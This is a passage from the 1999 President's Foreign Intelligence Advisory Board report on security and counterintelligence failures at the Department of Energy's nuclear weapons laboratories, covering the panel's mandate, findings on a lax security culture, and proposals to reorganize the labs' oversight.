On March 18, 1999, President William J. Clinton requested that the President’s Foreign Intelligence Advisory Board (PFIAB) undertake an inquiry and issue a report on “the security threat at the Department of Energy’s weapons labs and the adequacy of the measures that have been taken to address it.” Specifically, the President asked the PFIAB to “address the nature of the present counterintelligence security threat, the way in which it has evolved over the last two decades and the steps we have taken to counter it, as well as to recommend any additional steps that may be needed.” He also asked the PFIAB “to deliver its completed report to the Congress, and to the fullest extent possible consistent with our national security, release an unclassified version to the public.”

In response, the Honorable Warren B. Rudman, Chairman of PFIAB, appointed board members Ms. Ann Z. Caracristi, Dr. Sidney Drell, and Mr. Stephen Friedman to form the Special Investigative Panel and obtained detailees from several federal agencies (CIA, DOD, FBI) to augment the work of the PFIAB staff. Over the past three months, the panel and staff interviewed more than 100 witnesses, reviewed more than 700 documents encompassing thousands of pages, and conducted onsite research and interviews at five of the Department of Energy’s national laboratories and plants: Livermore, Los Alamos, Oak Ridge, Pantex, and Sandia.
The panel has produced a report and an appendix of supporting documents, both of which are unclassified to the fullest extent possible. A large volume of classified material, which was also reviewed and distilled for this report, has been relegated to a second appendix that is available only to authorized recipients.

This report examines:

 - The 20–year history of security and counterintelligence issues at the DOE national laboratories, with an emphasis on the five labs that focus on weapons–related research;
 - The inherent tension between security concerns and scientific freedom at the labs and its effect on the institutional culture and efficacy of the Department;
 - The growth and evolution of the foreign intelligence threat to the national labs, particularly in connection with the Foreign Visitor’s Program of the labs;
 - The implementation and effectiveness of Presidential Decision Directive No. 61, the reforms instituted by Secretary of Energy Bill Richardson, and other related initiatives; and,
 - Additional measures that should be taken to improve security and counterintelligence at the labs.

PANEL MEMBERS

The Honorable Warren B. Rudman, Chairman of the President’s Foreign Intelligence Advisory Board. Senator Rudman is a partner in the law firm of Paul, Weiss, Rifkind, Wharton, and Garrison. From 1980 to 1992, he served in the U.S. Senate, where he was a member of the Select Committee on Intelligence. Previously, he was Attorney General of New Hampshire.

Ms. Ann Z. Caracristi, board member. Ms. Caracristi, of Washington, DC, is a former Deputy Director of the National Security Agency, where she served in a variety of senior management positions over a 40–year career. She is currently a member of the DCI/Secretary of Defense Joint Security Commission and recently chaired a DCI Task Force on intelligence training. She was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community.

Dr. Sidney D. Drell, board member. Dr.
Drell, of Stanford, California is an Emeritus Professor of Theoretical Physics and a Senior Fellow at the Hoover Institution. He has served as a scientific consultant and advisor to several congressional committees, The White House, DOE, DOD, and the CIA. He is a member of the National Academy of Sciences and a past President of the American Physical Society.

Mr. Stephen Friedman, board member. Mr. Friedman is Chairman of the Board of Trustees of Columbia University and a former Chairman of Goldman, Sachs, & Co. He was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community and the Jeremiah Panel on the National Reconnaissance Office.

PFIAB STAFF

Randy W. Deitering, Executive Director
Mark F. Moynihan, Assistant Director
Roosevelt A. Roy, Administrative Officer
Frank W. Fountain, Assistant Director and Counsel
Brendan G. Melley, Assistant Director
Jane E. Baker, Research/Administrative Officer

PFIAB ADJUNCT STAFF

Roy B., Defense Intelligence Agency
Karen DeSpiegelaere, Federal Bureau of Investigation
Jerry L., Central Intelligence Agency
Christine V., Central Intelligence Agency
David W. Swindle, Department of Defense, Naval Criminal Investigative Service
Joseph S.
O’Keefe, Department of Defense, Office of the Secretary of Defense

TABLE OF CONTENTS

FOREWORD  I-IV
FINDINGS  1
ROOT CAUSES  7
  An International Enterprise  7
  Big, Byzantine, and Bewildering Bureaucracy  8
  Lack of Accountability  10
  Culture and Attitudes  11
  Changing Times, Changing Missions  12
RECURRING VULNERABILITIES  13
  Management and Planning  13
  Physical Security  18
  Screening and Monitoring Personnel  20
  Protection of Classified and Sensitive Information  21
  Tracking Nuclear Materials  22
  Foreign Visitors’ Program  23
ASSESSMENTS  29
  Responsibility  29
  Record of the Clinton Team  30
  The 1995 “Walk-In” Document  30
  W-88 Investigation  31
  Damage Assessment  35
  PDD-61: Birth and Intent  36
  Timeliness of PDD-61  37
  Secretary Richardson’s Initiatives  38
  Prospects for Reforms  39
  Trouble Ahead  40
  Back to the Future  41
REORGANIZATION  43
  Leadership  43
  Restructuring  46
RECOMMENDATIONS  53
ENDNOTES
APPENDIX
  Map of DOE Installations
  Chronology of Events
  Chronology of Reports on DOE
  Damage Assessment of China’s Acquisition of U.S. Nuclear Information
  Presidential Decision Directive 61
  Bibliography

FOREWORD FROM THE SPECIAL INVESTIGATIVE PANEL

For the past two decades, the Department of Energy has embodied science at its best and security of secrets at its worst. Within DOE are a number of the crown jewels of the world’s government–sponsored scientific research and development organizations. With its record as the incubator for the work of many talented scientists and engineers—including many Nobel prize winners—DOE has provided the nation with far–reaching advantages. Its discoveries not only helped the United States to prevail in the Cold War, they undoubtedly will continue to provide both technological benefits and inspiration for the progress of generations to come.
The vitality of its national laboratories is derived to a great extent from their ability to attract talent from the widest possible pool, and they should continue to capitalize on the expertise of immigrant scientists and engineers. However, we believe that the dysfunctional structure at the heart of the Department has too often resulted in the mismanagement of security in weapons–related activities and a lack of emphasis on counterintelligence.

DOE was created in 1977 and heralded as the centerpiece of the federal solution to the energy crisis that had stunned the American economy. A vital part of this new initiative was the Energy Research and Development Administration (ERDA), the legacy agency of the Atomic Energy Commission (AEC) and inheritor of the national programs to develop safe and reliable nuclear weapons. The concept, at least, was straightforward: take the diverse and dispersed energy research centers of the nation, bring them under an umbrella organization with other energy–related enterprises, and spark their scientific progress through closer contacts and centralized management.

__________________________________
At the birth of DOE, the brilliant scientific breakthroughs of the nuclear weapons laboratories came with a troubling record of security administration. Twenty years later, virtually every one of its original problems persists.
__________________________________

However, the brilliant scientific breakthroughs at the nuclear weapons laboratories came with a very troubling record of security administration. For example, classified documents detailing the designs of the most advanced nuclear weapons were found on library shelves accessible to the public at the Los Alamos laboratory. Employees and researchers were receiving little, if any, training or instruction regarding espionage threats. Multiple chains of command and standards of performance negated accountability, resulting in pervasive inefficiency, confusion, and mistrust.
Competition among laboratories for contracts, and among researchers for talent, resources, and support distracted management from security issues. Fiscal management was bedeviled by sloppy accounting. Inexact tracking of the quantities and flows of nuclear materials was a persistent worry. Geographic decentralization fractured policy implementation and changes in leadership regularly depleted the small reservoirs of institutional memory. Permeating all of these issues was a prevailing cultural attitude among some in the DOE scientific community that regarded the protection of nuclear know–how with either fatalism or naiveté.

Twenty years later, every one of these problems still existed. Most still exist today.

__________________________________
The panel found a department saturated with cynicism, an arrogant disregard for authority, and a staggering pattern of denial.
__________________________________

In response to these problems, the Department has been the subject of a nearly unbroken history of dire warnings and attempted but aborted reforms. A cursory review of the open-source literature on the DOE record of management presents an abysmal picture. Second only to its world–class intellectual feats has been its ability to fend off systemic change. Over the last dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. No President, Energy Secretary, or Congress has been able to stem the recurrence of fundamental problems. All have been thwarted time after time by the intransigence of this institution.

The Special Investigative Panel found a large organization saturated with cynicism, an arrogant disregard for authority, and a staggering pattern of denial. For instance, even after President Clinton issued Presidential Decision Directive 61 ordering that the Department make fundamental changes in security procedures, compliance by Department bureaucrats was grudging and belated.
Time after time over the past few decades, officials at DOE headquarters and the weapons labs themselves have been presented with overwhelming evidence that their lackadaisical oversight could lead to an increase in the nuclear threat against the United States. Throughout its history, the Department has been the subject of scores of critical reports from the General Accounting Office (GAO), the intelligence community, independent commissions, private management consultants, its Inspector General, and its own security experts. It has repeatedly attempted reforms. Yet the Department’s ingrained behavior and values have caused it to continue to falter and fail.

PROSPECTS FOR REFORMS

We believe that Secretary of Energy Richardson, in attempting to deal with many critical security matters facing the Department, is on the right track in some, though not all, of his changes. We concur with and encourage many of his recent initiatives, and we are heartened by his aggressive approach and command of the issues. But we believe that he has overstated the case when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are, today, safe and secure.”

After a review of more than 700 reports and studies, thousands of pages of classified and unclassified source documents, interviews with scores of senior federal officials, and visits to several of the DOE laboratories at the heart of this inquiry, the Special Investigative Panel has concluded the Department of Energy is incapable of reforming itself—bureaucratically and culturally—in a lasting way, even under an activist Secretary. The panel has found that DOE and the weapons laboratories have a deeply rooted culture of low regard for and, at times, hostility to security issues, which has continually frustrated the efforts of its internal and external critics, notably the GAO and the House Energy and Commerce Committee.
Therefore, a reshuffling of offices and lines of accountability may be a necessary step toward meaningful reform, but it almost certainly will not be sufficient. Even if every aspect of the ongoing structural reforms is fully implemented, the most powerful guarantor of security at the nation’s weapons laboratories will not be laws, regulations, or management charts. It will be the attitudes and behavior of the men and women who are responsible for the operation of the labs each day. These will not change overnight, and they are likely to change only in a different cultural environment—one that values security as a vital and integral part of day–to–day activities and believes it can coexist with great science.

We are convinced that when Secretary Richardson vacates the office his successor is not likely to have a comparable appreciation of the gravity of the Department’s past problems, nor a comparable interest in resolving them. The next Secretary of Energy will not have spent months at the tip of the sword created by the recent public outcry over DOE mismanagement of national secrets. Indeed, the core of the Department’s bureaucracy is quite capable of undoing Secretary Richardson’s reforms, and may well be inclined to do so if given the opportunity.

Ultimately, the nature of the institution and the structure of the incentives under a culture of scientific research require great attention if they are to be made compatible with the levels of security and the degree of command–and–control warranted where the research and stewardship of nuclear weaponry is concerned. Yet it must be done.

THE PFIAB INQUIRY

The PFIAB panel is fully aware of the many recent allegations of management failures surrounding the Department of Energy and questions about the subsequent roles of entities such as the Department of Justice, the Federal Bureau of Investigation, and the Central Intelligence Agency. Much of the research we conducted has relevance to these allegations.
However, the depth and the complexity of the issues call for examinations by institutions with greater resources and a wider charter: namely, Congress and standing executive agencies of the federal government.

In the 90 days of our inquiry, the PFIAB panel conducted numerous interviews with senior federal officials who agreed to speak candidly—with the understanding that they would not be identified by name—about DOE’s problems and recent events.

On balance, the panel finds that some very damaging security compromises may have occurred, as alleged by some in recent weeks. But we believe that in matters of intelligence and counterintelligence, one cannot brush off the reality that conclusions are often intrinsically based on probabilities, rather than certainties. Leaders, of course, are often obliged to act, and should act, based on the probability of impending danger, not only its certainty. And those entrusted with the public weal are indisputably served better by having more information about risks than less.

So the panel would like to note the contributions of those who have helped to raise the public’s awareness of the risks to national security posed by problems at DOE. Although we do not concur with all of their conclusions, we believe that both intelligence officials at the Department of Energy and the members of the Cox Committee made substantial and constructive contributions to understanding and resolving security problems at DOE.

As we note later in this report, we concur on balance with the damage assessment of espionage losses conducted by the Director of Central Intelligence. We also concur with the findings of the independent review of that assessment by Admiral David Jeremiah and his panel.

Our mandate from President Clinton was restricted to an analysis of the structural and management problems in the Department’s security and counterintelligence operations. We abided by that.
We also recognize the unique nature of the assignment given to us by the President. Never before in its history of more than 35 years has the PFIAB prepared a report for release to the general public. As a result, we have taken pains to ensure that the language of this report is “plain English,” not bureaucratese, and that the findings of the report are stated directly and candidly, not with the indirection and euphemisms often employed by policy insiders.

SOLUTIONS

Our panel has concluded that the Department of Energy, when faced with a profound public responsibility, has failed. Therefore, this report suggests two alternative organizational solutions, both of which we believe would substantially insulate the weapons laboratories from many of DOE’s historical problems and promote the building of a responsible culture over time. We also offer recommendations for improving various aspects of security and counterintelligence at DOE, such as personnel assurance, cyber–security, program management, and interdepartmental cooperation under the Foreign Intelligence Surveillance Act of 1978.

The weapons research and stockpile management functions should be placed wholly within a new semi–autonomous agency within DOE that has a clear mission, streamlined bureaucracy, and drastically simplified lines of authority and accountability. Useful lessons along these lines can be taken from the National Security Agency (NSA) or Defense Advanced Research Projects Agency (DARPA) within the Department of Defense or the National Oceanographic and Atmospheric Administration (NOAA) within the Department of Commerce.

The other alternative is a wholly independent agency, such as the National Aeronautics and Space Administration (NASA). There was substantial debate among the members of the panel about these two alternatives. Both have strengths and weaknesses.
In the final analysis, the decision rests in the hands of the President and the Congress, and we trust that they will give serious deliberation to the merits and shortcomings of the alternatives before enacting major reforms. We all agree, nonetheless, that the labs should never be subordinated to the Department of Defense.

With either proposal it will be important for the weapons labs to maintain effective scientific contact on nonclassified scientific research with the other DOE labs and the wider scientific community. To do otherwise would work to the detriment of the nation’s scientific progress and security over the long run. This argument draws on history: nations that honor and advance freedom of inquiry have fared better than those who have sought to arbitrarily suppress and control the community of science.

__________________________________
The nuclear weapons and research functions of DOE need more autonomy, a clearer mission, a streamlined bureaucracy, and increased accountability.
__________________________________

However, we would submit that we do not face an either/or proposition. The past 20 years have provided a controlled experiment of a sort, the results of which point to institutional models that hold promise. Organizations such as NASA and DARPA have advanced scientific and technological progress while maintaining a respectable record of security. Meanwhile, the Department of Energy, with its decentralized structure, confusing matrix of cross–cutting and overlapping management, and shoddy record of accountability has advanced scientific and technological progress, but at the cost of an abominable record of security with deeply troubling threats to American national security.

Thomas Paine once said that “government, even in its best state, is but a necessary evil; in its worst state, an intolerable one.” This report finds that DOE’s performance, throughout its history, should have been regarded as intolerable.
We believe the results and implications of this experiment are clear. It is time for the nation’s leaders to act decisively in the defense of America’s national security.

Warren Rudman, Chairman of the President’s Foreign Intelligence Advisory Board
Ms. Ann Caracristi, Board Member
Dr. Sidney Drell, Board Member
Mr. Stephen Friedman, Board Member

FINDINGS

On March 18, 1999, President Clinton tasked the Foreign Intelligence Advisory Board to review the history of the security and counterintelligence threats to the nation’s weapons labs and the effectiveness of the responses by the U.S. government. He also asked the Board to propose further improvements. This report, based on reviews of hundreds of source documents and studies, analysis of intelligence reports, and scores of interviews with senior level officials from several administrations, was prepared over the past 90 days in fulfillment of the President’s request.

BOTTOM LINE

Our bottom line: DOE represents the best of America’s scientific talent and achievement, but it has also been responsible for the worst security record on secrecy that the members of this panel have ever encountered. The national labs of the Department of Energy are among the crown jewels of the world’s government–sponsored scientific research and development organizations. With its record as the incubator for the work of many talented scientists and engineers—including many Nobel prize winners—it has provided the nation with far–reaching advantages. Its discoveries not only helped the United States to prevail in the Cold War, they will undoubtedly provide both technological benefits and inspiration for the progress of generations to come. Its vibrancy is derived to a great extent from its ability to attract talent from the widest possible pool, and it should continue to capitalize on the expertise of immigrant scientists and engineers.
However, the Department has devoted far too little time, attention, and resources to the prosaic but grave responsibilities of security and counterintelligence in managing its weapons and other national security programs.

FINDINGS

The preponderance of evidence accumulated by the Special Investigative Panel, spanning the past 25 years, has compelled the members to reach many definite conclusions—some very disturbing—about the security and well–being of the nation’s weapons laboratories. As the repository of America’s most advanced know-how in nuclear and related armaments and the home of some of America’s finest scientific minds, these labs have been and will continue to be a major target of foreign intelligence services, friendly as well as hostile. Two landmark events, the end of the Cold War and the overwhelming victory of the United States and its allies in the Persian Gulf War, markedly altered the security equations and outlooks of nations throughout the world. Friends and foes of the United States intensified their efforts to close the technological gap between their forces and those of America, and some redoubled their efforts in the race for weapons of mass destruction. Under the restraints imposed by the Comprehensive Test Ban Treaty, powerful computers have replaced detonations as the best available means of testing the viability and performance capabilities of new nuclear weapons. So research done by U.S. weapons laboratories with high performance computers stands particularly high on the espionage hit list of other nations, many of which have used increasingly more sophisticated and diverse means to obtain the secrets necessary to join the nuclear club.

______________________________________
Snapshot: DOE Weapons Operations

Percentage of Budget: Roughly $6 billion, a third of the Department’s $18 billion FY99 budget.

Allocation of Weapons-Related Budget ($ billions):
  Defense Programs              4.4
  Nonproliferation/Nat. Sec.    0.7
  Fissile Material Disposal     0.2
  Naval Reactors                0.7

Number of Contract Employees: 34,190

Number of Contract Employees Per Lab:
  Los Alamos          6,900
  Sandia              7,500
  L. Livermore        6,400
  Pantex              2,860
  Oak Ridge (Y-12)    5,500
  Kansas City         3,150
  Nevada Test Site    1,880

SOURCE: DEPT. OF ENERGY FIELD FACTBOOK, MAY 1998
______________________________________

More than 25 years worth of reports, studies and formal inquiries—by executive branch agencies, Congress, independent panels, and even DOE itself—have identified a multitude of chronic security and counterintelligence problems at all of the weapons labs (See Appendix). These reviews produced scores of stern, almost pleading, entreaties for change. Critical security flaws—in management and planning, personnel assurance, some physical security areas, control of nuclear materials, protection of documents and computerized information, and counterintelligence—have been cited for immediate attention and resolution … over and over and over … ad nauseam. The open–source information alone on the weapons laboratories overwhelmingly supports a troubling conclusion: their security and counterintelligence operations have been seriously hobbled and relegated to low-priority status for decades. The candid, closed–door testimony of current and former federal officials as well as the content of voluminous classified materials received by this panel in recent weeks reinforce this conclusion. When it comes to a genuine understanding of and appreciation for the value of security and counterintelligence programs, especially in the context of America’s nuclear arsenal and secrets, the DOE and its weapons labs have been Pollyannaish. The predominant attitude toward security and counterintelligence among many DOE and lab managers has ranged from half–hearted, grudging accommodation to smug disregard. Thus the panel is convinced that the potential for major leaks and thefts of sensitive information and material has been substantial.
Moreover, such security lapses would have occurred in bureaucratic environments that would have allowed them to go undetected with relative ease. Organizational disarray, managerial neglect, and a culture of arrogance—both at DOE headquarters and the labs themselves—conspired to create an espionage scandal waiting to happen. The physical security efforts of the weapons labs (often called the “guns, guards, and gates”) have had some isolated shortcomings, but on balance they have developed some of the most advanced security technology in the world. However, perpetually weak systems of personnel assurance, information security, and counterintelligence have invited attack by foreign intelligence services. Among the defects this panel found:

· Inefficient personnel clearance programs, wherein haphazard background investigations could take years to complete and the backlogs numbered in the tens of thousands.
· Loosely controlled and casually monitored programs for thousands of unauthorized foreign scientists and assignees—despite more than a decade of critical reports from the General Accounting Office, the DOE Inspector General, and the intelligence community. This practice occasionally created bizarre circumstances in which regular lab employees with security clearances were supervised by foreign nationals on temporary assignment.
· Feckless systems for control of classified documents, which periodically resulted in thousands of documents being declared lost.
· Counterintelligence programs with part–time CI officers, who often operated with little experience, minimal budgets, and employed little more than crude “awareness” briefings of foreign threats and perfunctory and sporadic debriefings of scientists travelling to foreign countries.
· A lab security management reporting system that led everywhere but to responsible authority.
· Computer security methods that were naive at best and dangerously irresponsible at worst.
Why were these problems so blatantly and repeatedly ignored? DOE has had a dysfunctional management structure and culture that only occasionally gave proper credence to the need for rigorous security and counterintelligence programs at the weapons labs. For starters, there has been a persisting lack of real leadership and effective management at DOE. The nature of the intelligence–gathering methods used by the People’s Republic of China poses a special challenge to the U.S. in general and the weapons labs in particular. More sophisticated than some of the blatant methods employed by the former Soviet bloc espionage services, PRC intelligence operatives know their strong suits and play them extremely well. Increasingly more nimble, discreet and transparent in their spying methods, the Chinese services have become very proficient in the art of seemingly innocuous elicitations of information. This modus operandi has proved very effective against unwitting and ill–prepared DOE personnel. Despite widely publicized assertions of wholesale losses of nuclear weapons technology from specific laboratories to particular nations, the factual record in the majority of cases regarding the DOE weapons laboratories supports plausible inferences—but not irrefutable proof—about the source and scope of espionage and the channels through which recipient nations received information. The panel was not charged, nor was it empowered, to conduct a technical assessment regarding the extent to which alleged losses at the national weapons laboratories may have directly advanced the weapons development programs of other nations. However, the panel did find these allegations to be germane to issues regarding the structure and effectiveness of DOE security programs, particularly the counterintelligence functions. The classified and unclassified evidence available to the panel, while pointing out systemic security vulnerabilities, falls short of being conclusive. The actual damage done to U.S. 
security interests is, at the least, currently unknown; at worst, it may be unknowable. Numerous variables are inescapable. Analysis of indigenous technology development in foreign research laboratories is fraught with uncertainty. Moreover, a nation that is a recipient of classified information is not always the sponsor of the espionage by which it was obtained. However, the panel does concur, on balance, with the findings of the recent DCI–sponsored damage assessment. We also concur with the findings of the subsequent independent review, led by retired Admiral David Jeremiah, of that damage assessment. The Department of Energy is a dysfunctional bureaucracy that has proven it is incapable of reforming itself. Accountability at DOE has been spread so thinly and erratically that it is now almost impossible to find. The long traditional and effective method of entrenched DOE and lab bureaucrats is to defeat security reform initiatives by waiting them out. They have been helped in this regard by the frequent changes in leadership at the highest levels of DOE—nine Secretaries of Energy in 22 years. Eventually, the reform–minded management transitions out, either due to a change in administrations or as a result of the traditional “revolving door” management practices at DOE. Then the bureaucracy reverts to old priorities and predilections. Such was the case in December 1990 with the reform recommendations carefully crafted by a special task force commissioned by then–Energy Secretary Watkins. The report skewered DOE for unacceptable “direction, coordination, conduct, and oversight” of safeguards and security. Two years later, the new administration rolled in, redefined priorities, and the initiatives all but evaporated. Deputy Secretary Charles Curtis in late 1996 investigated clear indications of serious security and CI problems and drew up a list of initiatives in response. Those initiatives also were dropped after he left office. 
Reorganization is clearly warranted to resolve the many specific problems with security and counterintelligence in the weapons laboratories, but also to address the lack of accountability that has become endemic throughout the entire Department. Layer upon layer of bureaucracy, accumulated over the years, has diffused responsibility to the point where scores claim it, no one has enough to make a difference, and all fight for more. Convoluted, confusing, and often contradictory reporting channels make the relationship between DOE headquarters and the labs, in particular, tense, internecine, and chaotic. In between the headquarters and the laboratories are field offices, which the panel found to be a locus of much confusion. In background briefings of the panel, senior DOE officials often described them as redundant operations that function as a shadow headquarters, often using their political clout and large payrolls to push their own agendas and budget priorities in Congress. Even with the latest DOE restructuring, the weapons labs are reporting to far too many DOE masters. The criteria for the selection of Energy Secretaries have been inconsistent in the past. Regardless of the outcome of ongoing or contemplated reforms, the minimum qualifications for an Energy Secretary should include experience in not only energy and scientific issues, but national security and intelligence issues as well. The list of former Secretaries, Deputy Secretaries, and Under Secretaries meeting all of these criteria is very short. Despite having a large proportion of its budget (roughly 30 percent) devoted to functions related to nuclear weapons, the Department of Energy has often been led by men and women with little expertise and background in national security. 
The result has been predictable: security issues have been a low priority, and leaders unfamiliar with these issues have delegated decisionmaking to lesser–ranking officials who lacked the incentives and authority to address problems with dispatch and forcefulness. For a Department in desperate need of strong leadership on security issues, this has been a disastrous trend. The bar for future nominees at the upper levels of the Department needs to be raised significantly. DOE cannot be fixed with a single legislative act: management must follow mandate. The research functions of the labs are vital to the nation’s long term interest, and instituting effective gates between weapons and nonweapons research functions will require disinterested scientific expertise, judicious decisionmaking, and considerable political finesse. Thus both Congress and the executive branch—whether along the lines suggested by the Special Investigative Panel or others—should be prepared to monitor the progress of the Department’s reforms for years to come. This panel has no illusions about the future of security and counterintelligence at DOE. There is little reason to believe future DOE Secretaries will necessarily share the resolve of Secretary Richardson, or even his interest. When the next Secretary of Energy is sworn in, perhaps in the spring of 2001, the DOE and lab bureaucracies will still have advantages that could give them the upper hand: time and proven skills at artful dodging and passive intransigence. The Foreign Visitors’ and Assignments Program has been and should continue to be a valuable contribution to the scientific and technological progress of the nation. Foreign nationals working under the auspices of U.S. weapons labs have achieved remarkable scientific advances and contributed immensely to a wide array of America’s national security interests, including nonproliferation. Some have made contributions so unique that they are all but irreplaceable.
The value of these contacts to the nation should not be lost amid the attempt to address deep, well–founded concerns about security lapses. That said, DOE clearly requires measures to ensure that legitimate use of the research laboratories for scientific collaboration is not an open door to foreign espionage agents. Losing national security secrets should never be accepted as an inevitable cost of obtaining scientific knowledge. In commenting on security issues at DOE, we believe that both Congressional and Executive Branch leaders have resorted to simplification and hyperbole in the past few months. The panel found neither the dramatic damage assessments nor the categorical reassurances of the Department’s advocates to be wholly substantiated. We concur with and encourage many of Secretary Richardson’s recent initiatives to address the security problems at the Department, and we are heartened by his aggressive approach and command of the issues. He has recognized the organizational dysfunction and cultural vagaries at DOE and taken strong, positive steps to try to reverse the legacy of more than 20 years of security mismanagement. However, the Board is extremely skeptical that any reform effort, no matter how well–intentioned, well–designed, and effectively applied, will gain more than a toehold at DOE, given its labyrinthine management structure, fractious and arrogant culture, and the fast–approaching reality of another transition in DOE leadership. 
Thus we believe that he has overstated the case when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are, today, safe and secure.” Similarly, the evidence indicating widespread security vulnerabilities at the weapons laboratories has been ignored for far too long, and the work of the Cox Committee and intelligence officials at the Department has been invaluable in gaining the attention of the American public and in helping focus the political will necessary to resolve these problems. Nonetheless, there have been many attempts to take the valuable coin of damaging new information and decrease its value by manufacturing its counterfeit, innuendo; possible damage has been minted as probable disaster; workaday delay and bureaucratic confusion have been cast as diabolical conspiracies. Enough is enough. Fundamental change in DOE’s institutional culture—including the ingrained attitudes toward security among personnel of the weapons laboratories—will be just as important as organizational redesign. Never have the members of the Special Investigative Panel witnessed a bureaucratic culture so thoroughly saturated with cynicism and disregard for authority. Never before has this panel found such a cavalier attitude toward one of the most serious responsibilities in the federal government—control of the design information relating to nuclear weapons. Particularly egregious have been the failures to enforce cyber–security measures to protect and control important nuclear weapons design information. Never before has the panel found an agency with the bureaucratic insolence to dispute, delay, and resist implementation of a Presidential directive on security, as DOE’s bureaucracy tried to do to the Presidential Decision Directive No. 61 in February 1998. The best nuclear weapons expertise in the U.S. government resides at the national weapons labs, and this asset should be better used by the intelligence community. 
For years, the PFIAB has been keen on honing the intelligence community’s analytic effectiveness on a wide array of nonproliferation areas, including nuclear weapons. We believe that the DOE Office of Intelligence, particularly its analytic component, has historically been an impediment to this goal because of its ineffective attempts to manage the labs’ analysis. The office’s mission and size (about 70 people) is totally out of step with the Department’s intelligence needs. A streamlined intelligence liaison body, much like Department of Treasury’s Office of Intelligence Support—which numbers about 20 people, including a 24–hour watch team—would be far more appropriate. It should concentrate on making the intelligence community, which has the preponderance of overall analytic experience, more effective in fulfilling the DOE’s analysis and collection requirements.

ROOT CAUSES

The sources of DOE’s difficulties in both overseeing scientific research and maintaining security are numerous and deep. The Special Investigative Panel primarily focused its inquiry on the areas within DOE where the tension between science and security is most critical: the nuclear weapons laboratories.1 To a lesser extent, the panel examined security issues in other areas of DOE and broad organizational issues that have had a bearing on the functioning of the laboratories. Inherent in the work of the weapons laboratories, of course, is the basic tension between scientific inquiry, which thrives on freewheeling searches for and wide dissemination of information, and governmental secrecy, which requires just the opposite. But the historical context in which the labs were created and thrived has also figured into their subsequent problems with security.

AN INTERNATIONAL ENTERPRISE

U.S. research laboratories have always had a tradition of drawing on immigrant talent. Perhaps the first foreign–born contributor to our nation’s nuclear program was Albert Einstein.
In his letter to President Roosevelt on August 2, 1939, Einstein advised the President of the possibility of the atomic bomb and the urgent need for government action. By 1943, the ranks of the Manhattan project at Los Alamos, New Mexico were filled with scientists and engineers from Italy (Fermi), Germany (Bethe), Poland (Ulam), Hungary (Wigner, Szilard, Von Neumann, and Teller), Russia (Kistiakovsy) and Austria (Rabi). Indeed, it is possible that the atomic bomb would never have been completed but for immigrant talent, and the diversity of talent applied to the project was hailed at the time as a model of international cooperation. Eleanor Roosevelt, in a 1945 radio address, declared that the development of the atomic bomb by “many minds belonging to different races and different religions sets the pattern for the way in which in the future we may be able to work out our difficulties.”2 The role of and reliance on immigrant talent in the United States—particularly at the graduate school and doctoral levels where much of the nation’s research is performed—has increased over the years. From 1975 to 1992, the aging of America’s baby boomers resulted in a decline in the overall size of the college–age population and, unlike other industrialized nations, the U.S. saw a decline in the number of American students receiving science and engineering degrees.3 From the 1950s until 1995, the number of non–U.S. citizens who earned doctorates in scientific and engineering fields from American universities steadily climbed, reaching 27 percent by 1985 and 40 percent by 1995. Two–thirds of those receiving those doctorates in 1995 held temporary residency visas, and Chinese doctoral recipients outnumbered recipients from all other regions combined.4 But the willingness to draw on foreign talent also has meant a greater risk of falling prey to those with foreign allegiances. 
One of the earliest and most infamous espionage scandals at the nation’s nuclear laboratories was centered on the physicist Klaus Fuchs, a German native and naturalized British citizen who spied on researchers at Los Alamos for the Soviet Union. More recent instances of actual and alleged foreign espionage at the nuclear weapons laboratories are detailed in the Classified Appendix to this report. As growth of the U.S. talent pool in science and engineering stagnated, and the amount of available talent abroad grew rapidly, the U.S. has had to rely on more foreign–born talent in national scientific research and development programs in order to maintain the best research facilities in the world. At the same time, since the end of the Cold War, DOE has entered into more extensive cooperative programs with foreign nations in efforts to reduce the threats of proliferation and diversion of nuclear weapons material. By June 1990, DOE had entered into 157 bilateral research and development agreements for scientific exchange purposes. Among others, parties to the agreements were the Soviet Union, the People’s Republic of China, Soviet bloc nations and countries that posed nuclear proliferation threats.5 In December 1990, a report to the DOE Secretary noted “a high probability of greatly increasing numbers of foreign visits and assignments to DOE facilities in future years.”6 The widening of foreign contacts concurrent with a greater influx of foreign–born talent has raised concerns about security compromises by scientists with foreign allegiances and highlighted the need for special care in implementing formal clearance procedures for involvement in classified work.

BIG, BYZANTINE, AND BEWILDERING BUREAUCRACY

DOE is not one of the federal government’s largest agencies in absolute terms, but its organizational structure is widely regarded as one of the most confusing.
That is another legacy of its origins, and it has made the creation, implementation, coordination, and enforcement of consistent policies very difficult over the years. The effort to develop the atomic bomb was managed through an unlikely collaboration of the Manhattan Engineering District of the U.S. Army Corps of Engineers (hence the name, “the Manhattan Project”) and the University of California—two vastly dissimilar organizations in both culture and mission. The current form of the Department took shape in the first year of the Carter Administration through the merging of more than 40 different government agencies and organizations, an event from which it has arguably never recovered. The newly created DOE subsumed the Federal Energy Administration, the Energy Research and Development Administration (ERDA), the Federal Power Commission, and components and programs of several other government agencies. Included were the nuclear weapons research laboratories that were part of the ERDA and, formerly, of the Atomic Energy Commission. Many of these agencies and organizations have continued to operate under the DOE umbrella with the same organizational structure that they had prior to joining the Department. Even before the new Department was created, concerns were raised about how high the nuclear weapons–related operations would rank among the competing priorities of such a large bureaucracy. A study of the issue completed in the last year of the Ford Administration considered three alternatives: shifting the weapons operations to the Department of Defense, creating a new freestanding agency, or keeping the program within ERDA—the options still being discussed more than 20 years later. As one critic of the DOE plan told The Washington Post, “Under the AEC, weapons was half the program. Under ERDA, it was one–sixth. Under DOE, it will be one–tenth. 
It isn’t getting the attention it deserves.” Although the proportions cited by that critic would prove to be inaccurate, he accurately spotted the direction of the trend.

_____________________________________
The DOE Management Challenge

MISSION
· Lead agency for development of national energy resources and technologies.
· Responsible for the largest environmental cleanup effort in history.
· Nuclear energy and weapons research and development.
· Management of special nuclear materials stockpiles.
· Protection of highly sensitive classified and proprietary information against foreign and corporate espionage.

SIZE
· If included among the Nation’s Fortune 500 firms, would rank in the top 50.
· The fourth largest landowner in the United States.
· Budget of roughly $18 billion comprises close to 3 percent of total discretionary spending at the federal level.
· Employs more than 11,000 Federal employees and more than 100,000 contract employees.
· Owns and manages more than 50 major installations spread across 2.4 million acres and 35 states.

COMPLEXITY
